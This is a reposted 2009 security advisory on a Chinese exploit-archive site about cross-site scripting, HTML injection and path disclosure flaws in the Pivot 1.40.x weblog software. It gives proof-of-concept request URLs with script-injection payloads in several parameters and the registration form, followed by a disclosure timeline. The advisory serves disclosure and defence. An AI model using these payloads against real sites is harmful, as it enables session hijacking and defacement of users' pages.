首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pivot 1.40.4-7 Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-06-17  
Pivot - XSS and HTML Injection Vulnerabilities

Versions Affected: 1.40.4 and 1.40.7 (22nd March 2009) (newest)

Info: Pivot is a web-based tool to help you maintain dynamic sites, like
weblogs or online journals. Pivot is released under the GPL so it is
completely free to use. It is written in PHP, and does not require
additional libraries or databases to function.

Credits: InterN0T

External Links:
http://www.pivotlog.net/


-:: The Advisory ::-

Vulnerable Function / ID Calls:
url, menu, sort, check[], edituser, edit, blog, cat.

Path Disclosure:
http://[HOST]/pivot/pivot/tb.php?tb_id=1&url='

Cross Site Scripting: (can only be triggered when One is not logged in).
http://[HOST]/pivot/pivot/index.php?menu="><script>alert(0)</script><br

Cross Site Scripting: (triggers on logged in administrators only) [low
or no impact due to session-key in url]
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&sort="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check[]='><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check['><script>alert(0)</script>]=0
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=edituser&edituser=</title><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=templates&edit=<script>alert(0)</script>

http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=blog_edit1&blog="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=cat_edit&cat="><script>alert(0)</script>

Cross Site Scripting using Post Method: (triggers on logged in
administrators only) [low impact - see above] << Filter Field.
'><script>alert(0)</script> in
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1

HTML Injection: (this will only affect the user logged in apparently..)
http://[HOST]/pivot/pivot/user.php?func=edit_prefs&w=my_weblog
sign up formular (all fields might be, but url is recommended to use)
(use "> to escape tag)
http://[HOST]/pivot/pivot/user.php?func=reg_user&w=my_weblog


http://[HOST]/pivot/pivot/user.php?func=reg_user&w=my_weblog
-- Set username to <script>alert(0)</script>
--- It is possible to trigger it other places such as in the title or in
the "hidden" input variable.
---- Use "> to escape the hidden tag and </title> to escape the title tag.


Affected Admin Site:
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=editcommuser&edituser=VALIDUSERHASH


-:: Solution ::-
The solution for this is not simple at all. I suggest a complete review
of the entire codebase.

Conclusion:
When we first checked the platform for vulnerabilities we had apparently
installed an old version, so we updated to the newest version which
apparently had some "XSS-bug fixed", strangely enough all the
vulnerabilities we found are still there.

Reference:
http://forum.intern0t.net/intern0t-advisories/1119-intern0t-pivot-1-40-4-7-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe

# [2009-06-12]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Asterisk IAX2 Resource Exhaust
·TBDev 01-01-2008 Multiple Remo
·phpWebThings <= 1.5.2 MD5 Hash
·TransLucid 1.75 Multiple Remot
·Green Dam 3.17 (URL) Remote Bu
·Uebimiau Web-Mail <= v3.2.0-1.
·Campus Virtual-LMS (XSS/SQL In
·WordPress Plugin FireStats <=
·4images <= 1.7.7 Filter Bypass
·Joomla Component com_Projectfo
·Zip Store Chat 4.0/5.0 (Auth B
·Impleo Music Collection 2.0 (S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved